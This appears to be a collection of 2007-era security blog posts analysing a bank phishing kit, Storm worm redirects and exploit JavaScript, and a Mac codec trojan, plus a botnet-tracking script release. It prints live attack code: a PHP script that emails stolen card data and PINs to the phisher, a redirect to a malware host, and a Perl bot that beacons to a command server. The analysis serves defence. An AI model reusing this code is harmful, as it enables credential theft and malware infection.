Walking through a phish site.

I just received this email in my inbox and figured some readers would enjoy some light reading.

Online Banking

Dear Regions Bank member,


We'd like to inform you that your Message Center has 1 new message. Please log in immediately and read the message. The Message Center contains only important information about your account and online banking.

Please follow this link in order to read your message:

http://tinyurl.com/2qzwsr

Choosing to ignore this message will result in a temporary suspension of your account within 24 hours, until you will choose to solve this unpleasant situation.

Sincerely,
RegionsNet Online Banking

All of my phish emails go to CastleCops, and I enjoy helping them out by doing the first bit of research on my own. I started by figuring out where the TinyURL is pointing. You can do this by setting a cookie "preview=1" before visiting the page, fetching the page with wget, or running a proxy like Paros or WebScarab. According to TinyURL, the 2qzwsr redirect points to "http:// backup.iirt .net/ icons/ www.regions bank.com/ EBanking/ logon/" where we are greeted with:


Now phishers aren't the brightest bunch. In fact the majority of them are down right stupid. By backing up a few directories, we're able to find an open index. It was probably accidentally left open by the web master. The stupid part is, the phisher didn't even bother to remove his kit: "http://backup. iirt.net/ icons/ regions.tgz"

In the archive we find: /www.regionsbank.com/EBanking/logon/done.php:

session_start();

$j_username = $_SESSION['j_username'];
$j_password = $_SESSION['j_password'];
$name = $HTTP_POST_VARS['name'];
$address = $HTTP_POST_VARS['address'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$p1 = $HTTP_POST_VARS['p1'];
$p2 = $HTTP_POST_VARS['p2'];
$p3 = $HTTP_POST_VARS['p3'];
$card = $HTTP_POST_VARS['card'];
$expm = $HTTP_POST_VARS['expm'];
$expy = $HTTP_POST_VARS['expy'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $HTTP_POST_VARS['pin'];
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$date = date("D M d, Y g:i a");

//sending email info here
$subj = "| CC: $card | EXP: $expm/$expy | CVV: $cvv | PIN: $pin |";
$msg = "Username: $j_username\nPassword: $j_password\nCardHolder Name: $name\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nPhone Number: $p1-$p2-$p3\nCredit Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin: $pin\n\n[ IP: $ip | $date ]";
$from = "From: Regions Bank";
mail("peacolo3@yahoo.com", $subj, $msg, $from);
header("Location: http://www.regions.com");

?>

So victim data is emailed to peacolo3@yahoo.com. We could send Mr Peacolo a nice email, but that could be considered baiting him...and we'd never do that..right? :)

Emails were sent to hostmaster@iirt.net and the phish was forwarded to CastleCops.

So grab your line, and go anti-phishing. -- For what its worth, TinyURL killed the site while I was writing this. Good job TinyURL.

Matt Jonkman is leaving Bleeding Threats

After five years, Matt has decided it is best to leave Bleeding Threats. A message posted to several mailing lists said:

After nearly 5 years as the founder and admin of Bleeding Edge Threats I
must step out of the project.

Sensory Networks, as many of you know, has very generously provided the
financial support that's made it possible for me to keep Bleeding
Threats up and running over the last 12 months. My sincere thanks to
them for this time, we've made some great things come to be in the open
security community!

Unfortunately I must step away from running Bleeding Threats, but wish
Sensory Networks all the best for the future. I'm sure that between the
community and Sensory the site can continue to grow and be a great resource.

Any questions about the future of Bleeding Threats should be directed to
the mailing lists and Sensory will soon post a direct contact. As always
for technical issues keep them flowing to the lists.

As for me, I'll still be in the community, starting something new,
please keep an eye out! I'll be as always at jonkman at jonkmans dot net,
please stay in touch!

Matt Jonkman

I'm sorry to see Matt leave. Many of you may know that he helped Shadowserver Foundation get off the ground back in 2004 by hosting the website. Matt is a good friend, and I look forward to hearing about his future endeavors. If you have time, send him a word of encouragement and thanks for all his time supporting Bleeding Edge Threats!

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded Javascript. It decodes to:

<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

That site opened by the Javascript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.

CME711-Track Beta

Several people are interested in learning more about CME711 and generally how to track botnets. I fully respect and encourage that curiosity with one caveat - you will get attacked and storm may not be the best starter botnet.

If the bad guys are half as good as I suspect they are, they already know how I am downloading their binaries, and they don't care or there is nothing they can do about it. Furthermore, its easier to hide in plain sight, so I've made a decision to open some code up to everyone. It really isn't all that special and others are probably using similar code. For someone new to this fight, it may be the jump start you need. Good botnet monitoring skills are in high demand.

Originally we ran FakeSMTP (an email honeypot) and forced the Storm binaries to communicate with that SMTP server instead of using public relays. FakeSMTP would capture the body of the message, which had the download link. I had a script automatically parse and download the binaries, but that was slow and clunky. It also relied on my node being used as a spam proxy, which was happening less frequently.

Additionally that meant I had to run the binary. Running the binary is risky. For example, you could participate in denial of service attacks. Even with rate limiting, you still run the risk of doing harm. Its certainly not recommended for those who are new to the arena.

CME711-Track is a PERL script I hacked together for tracking the Peacomm/Storm/Peed/Nuwar trojans. Similar code has been used by DISOG since July 2007. While I modified the code slightly for public release, the general function is the same. The script is very simple, it contacts CME711's servers and tries to download a binary. If successful, it saves the file and adds a time-stamp to the log. Such logs can be used as blocklists, or to track infected hosts.

I overly commented the code on purpose. I had hoped those new to PERL and the world of botnet tracking would download it and learn how things work. Plain text readable comments and code encourage additional research.

There are zero license restrictions on this script. Anyone is welcome to run it, for as long as you wish. I hope you would consider mentioning DISOG in any research/postings; however if you don't, my feelings aren't likely to be hurt.

Script requirements: see "readme.txt" for more information. The code will not run if you don't follow the directions included in the readme. I did that on purpose - I believe if you can't read, you shouldn't be tracking botnets.

WARNING: This script will attempt to download live malware and no support is provided. You assume all risks associated with downloading malware, or pissing off the botnet operators. This includes denial of service attacks. I tried to comment the code as much as possible, and you're welcome to send questions via email. I will do my best to answer them in a timely manor.

http://www.disog.org/public/CME711-Track.zip
(MD5: ac85bf1b06be2653c6e647b839c5a9b9 ) (SHA1: b4c93d489693616a8150e607d4b7e98ca1b2ec61)

Be smart! This code should run on any operating system with a PERL interpreter, which includes Windows. How ever it will download real malware. The risk of accidentally running this code on a Windows machine is high. I don't recommend it. Run it on Linux, Mac, or a virtual windows machine. You'll be wasting a lot of time cleaning up your machine - not to mention looking like an idiot - if you don't follow this simple warning.

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…

function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}

…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempts to hide their exploit in layered javascript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.

Mac Codec Trojan

Sunbelt is reporting about a codec style trojan targeted towards Mac users.

Alex from Sunbelt was kind enough to provide several researchers (and me) with links to this trojan. It appears that depending on your user agent (either Mac or Windows) you will be served a different version of the binary. We will not be linking to the binary at this time, and I will be focused on the Mac version, since that is the one getting all the attention.

The package is titled MacCodec, and does require your administrator password to mount. The default install location is /Library/Internet Plug-Ins/ and it comes with a pretty license agreement:

SOFTWARE INSTALLATION: Components bundled with our software may report to Licensor and/or its affiliates the installation status of certain marketing offers, such as toolbars, and also generalized installation information, such as language preference and operating system version, to assist Licensor in its product development. No personal information will be communicated to Licensor or its affiliates during this process. Licensor reserves the right to install additional components through its check/update system. These components could include Toolbar, Pop-up advertising solution, Commercial homepage manager, Commercial messenger and could modify some of your network settings.

PreInstall Script:

#!/bin/bash
s1=85.255.116.156
s2=85.255.112.15
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')

PostInstall Script:

#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"

Well commented perl bot:

#!/usr/bin/perl
use IO::Socket;
sub encode_base64 ($;$)
if ($] >= 5.006) {
require bytes;
if (bytes::length($_[0]) > length($_[0]) ||
($] >= 5.008 && $_[0] =~ /[^\0-\xFF]/))
require Carp;
Carp::croak("The Base64 encoding is only defined for bytes");
}
use integer;
my $eol = $_[1];
$eol = "\n" unless defined $eol;
my $res = pack("u", $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
}
return $res;
my $server="85.255.121.37";
my $cmd=`uname -p;echo ";";hostname`;
$cmd=~s/\n//g;
my $uniqid=encode_base64("mac;".$cmd);
$uniqid=~s/\n//g;
my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";
my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;
close($socket);

So, this Trojan requires the user to enter their password for install - which probably wont seem suspicious to the unsuspecting user, since a lot of software requires administrator password for install. Then changes DNS entries to 85.255.116.156 and 85.255.112.15. It attempts to make contact with a http based C&C at 85.255.121.37. You might want to think twice about installing suspicious looking codecs - porn just isn't that good.

The DNS servers point every invalid query (and probably a few valid porn sites) to 216.255.187.215 which Bleeding Edge recommends you block.

As expected, this is getting all sorts of attention from ISC. Its also sparked the Mac lovers vs haters debate on several forums. It really isn't all that special, just a Perl script packed in a dmg file. PerlBots have worked on Mac for ages now. While the thought of infecting a Mac or Linux box is sexy, this is hardly news. With that said, I do like the public attention Macs are getting, with regards to security. Regardless of operating system, users should remain on guard and prepared to use their common sense at all times.